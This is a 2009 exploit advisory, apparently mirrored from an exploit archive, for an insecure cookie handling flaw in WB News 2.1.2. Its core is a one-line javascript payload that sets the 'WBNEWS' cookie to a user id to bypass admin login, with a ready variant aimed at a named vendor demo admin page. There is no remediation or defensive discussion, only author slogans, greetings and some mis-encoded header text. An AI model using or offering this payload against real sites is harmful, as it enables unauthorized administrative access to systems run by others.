[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : WB News 2.1.2 Insecure Cookie Handling Vulnerability
# Published : 2009-04-20
# Author : ThE g0bL!N
# Previous Title : WysGui CMS 1.2b (Insecure Cookie Handling) Blind SQL Injection Exploit
# Next Title : FunGamez rc1 (AB/LFI) Multiple Remote Vulnerabilities


[~] ----------------------------?¨?3ù… ?§ù?ù?ù? ?§ù??±?-ù…ù? ?§ù??±?-ù?ù…-----------------------------
  
 [~]Download: http://www.webmobo.com/downloads/
  
 [~]Software: wb news 2.1.2
 [~]author: ThE g0bL!N
  
  
 [~] Home: WWW.h4ckf0ru.com
Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
             Aflawa Kamikaz Wa4rin Fi kol Bla4s
[~] -----------------------------{ Iam MuSlIm}------------------------------
  
wb news 2.1.2 Insecure Cookie Handling Vulnerability
---------------------------------------
exploit:
-------
javascript:document.cookie="WBNEWS=[id];path=/";
demo
----
http://demo.webmobo.com/news/admin/
exploit for demo
----------------
javascript:document.cookie="WBNEWS=1;path=/";
 
[~]--------------------------------------------------------------------------------
 
 [~] Greetz tO:
  [~]
  [~] Dos-Dz TeaM - Snakes TeaM - Team Sobh4n ALLAH -His0k4-
  [~]
  [~]
  [~]
  [~]
 
 [~]--------------------------------------------------------------------------------

# www.Syue.com [2009-04-20]